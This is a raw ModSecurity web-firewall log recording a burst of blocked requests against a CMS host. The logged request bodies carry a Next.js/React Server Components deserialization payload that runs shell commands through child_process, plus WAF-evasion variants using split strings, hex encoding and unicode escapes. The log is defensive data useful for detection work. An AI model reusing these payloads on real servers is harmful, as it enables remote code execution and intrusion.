"(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('chi' 'ld_' 'pro' 'cess').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzLxQSOrq_iRTM7dpqQAAAQ0"] [Sun Apr 05 15:42:36.388787 2026] [:error] [pid 23077:tid 23098] [client 172.94.9.253:43188] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signin"] [unique_id "adJmzJc83uMXRUE9zvQS7AAAAc8"] [Sun Apr 05 15:42:36.392459 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:43110] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzLxQSOrq_iRTM7dpqwAAAQU"] [Sun Apr 05 15:42:36.392561 2026] [:error] [pid 1309:tid 1380] [client 172.94.9.253:43204] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzD-XKUNJEHmNu6G7vQAAAIk"] [Sun Apr 05 15:42:36.393013 2026] [:error] [pid 23077:tid 23106] [client 172.94.9.253:43194] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzJc83uMXRUE9zvQS7gAAAdc"] [Sun Apr 05 15:42:36.393027 2026] [:error] [pid 23077:tid 23088] [client 172.94.9.253:43146] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzJc83uMXRUE9zvQS7QAAAcU"] [Sun Apr 05 15:42:36.393878 2026] [:error] [pid 13019:tid 13246] [client 172.94.9.253:43176] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('powershell -c \\x2241*271\\x22').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzLxQSOrq_iRTM7dprAAAAQY"] [Sun Apr 05 15:42:36.394067 2026] [:error] [pid 13019:tid 13256] [client 172.94.9.253:43132] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzLxQSOrq_iRTM7dprQAAARA"] [Sun Apr 05 15:42:36.497942 2026] [:error] [pid 13019:tid 13264] [client 172.94.9.253:43270] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync(Buffer.from('6563686f2024282834312a3237312929','hex').toString()).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x2..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dprgAAARg"] [Sun Apr 05 15:42:36.498064 2026] [:error] [pid 31198:tid 31257] [client 172.94.9.253:43228] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzDT5TgrBR8xRnfXA8gAAAUU"] [Sun Apr 05 15:42:36.499687 2026] [:error] [pid 1503:tid 1517] [client 172.94.9.253:43252] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22$K4\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:const..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzEI7AjfUQYCN-J7DngAAAMg"] [Sun Apr 05 15:42:36.511333 2026] [:error] [pid 13019:tid 13244] [client 172.94.9.253:43230] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzLxQSOrq_iRTM7dpsAAAAQQ"] [Sun Apr 05 15:42:36.511384 2026] [:error] [pid 13019:tid 13253] [client 172.94.9.253:43232] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzLxQSOrq_iRTM7dprwAAAQ0"] [Sun Apr 05 15:42:36.511398 2026] [:error] [pid 23077:tid 23094] [client 172.94.9.253:43248] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:\\x5cu005f\\x5cu005f\\x5cu0070\\x5cu0072\\x5cu006f\\x5cu0074\\x5cu006f\\x5cu005f\\x5cu005f:\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22\\x5cu0072\\x5cu0065\\x5cu0073\\x5cu006f\\x5cu006c\\x5cu0076\\x5cu0065\\x5cu0064\\x5cu005f\\x5cu006d\\x5cu006f\\x5cu0064\\x5cu0065\\x5cu006c\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu0..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzJc83uMXRUE9zvQS8AAAAcs"] [Sun Apr 05 15:42:36.512368 2026] [:error] [pid 13019:tid 13245] [client 172.94.9.253:43222] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var r=process.mainModule.require('child_process').spawnSync('sh',['-c','echo $((41*271))']);var res=r.stdout.toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22..."] [sever [hostname "cms.dev-unit.com"] [uri "/register"] [unique_id "adJmzLxQSOrq_iRTM7dpsQAAAQU"] [Sun Apr 05 15:42:36.512489 2026] [:error] [pid 23077:tid 23105] [client 172.94.9.253:43214] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22\\x5cu0074\\x5cu0068\\x5cu0065\\x5cu006e\\x22:\\x22$1:__proto__:then\\x22,\\x22\\x5cu0073\\x5cu0074\\x5cu0061\\x5cu0074\\x5cu0075\\x5cu0073\\x22:\\x22resolved_model\\x22,\\x22\\x5cu0072\\x5cu0065\\x5cu0061\\x5cu0073\\x5cu006f\\x5cu006e\\x22:-1,\\x22\\x5cu0076\\x5cu0061\\x5cu006c\\x5cu0075\\x5cu0065\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim(..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzJc83uMXRUE9zvQS8QAAAdY"] [Sun Apr 05 15:42:36.512893 2026] [:error] [pid 1503:tid 1505] [client 172.94.9.253:43260] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var/*bypass*/res=process.mainModule.require(/*waf*/'child_process'/*bypass*/).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_f..."] [sever [hostname "cms.dev-unit.com"] [uri "/dashboard"] [unique_id "adJmzEI7AjfUQYCN-J7DnwAAAMA"] [Sun Apr 05 15:42:36.514138 2026] [:error] [pid 23077:tid 23100] [client 172.94.9.253:43244] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require('child_process').execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\..."] [sever [hostname "cms.dev-unit.com"] [uri "/signup"] [unique_id "adJmzJc83uMXRUE9zvQS8gAAAdE"] [Sun Apr 05 15:42:36.587804 2026] [:error] [pid 13019:tid 13262] [client 172.94.9.253:43376] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22then\\x22:\\x22$1:__proto__:then\\x22,\\x22status\\x22:\\x22resolved_model\\x22,\\x22reason\\x22:-1,\\x22value\\x22:\\x22{\\x5c\\x22then\\x5c\\x22:\\x5c\\x22$B1337\\x5c\\x22}\\x22,\\x22_response\\x22:{\\x22_prefix\\x22:\\x22var res=process.mainModule.require(['child','_','process'].join('')).execSync('echo $((41*271))').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22,\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x..."] [sever [hostname "cms.dev-unit.com"] [uri "/admin"] [unique_id "adJmzLxQSOrq_iRTM7dpsgAAARY"] [Sun Apr 05 15:42:36.594670 2026] [:error] [pid 1503:tid 1527] [client 172.94.9.253:43366] [client 172.94.9.253] ModSecurity: Access denied with code 403 (phase 2). Pattern match 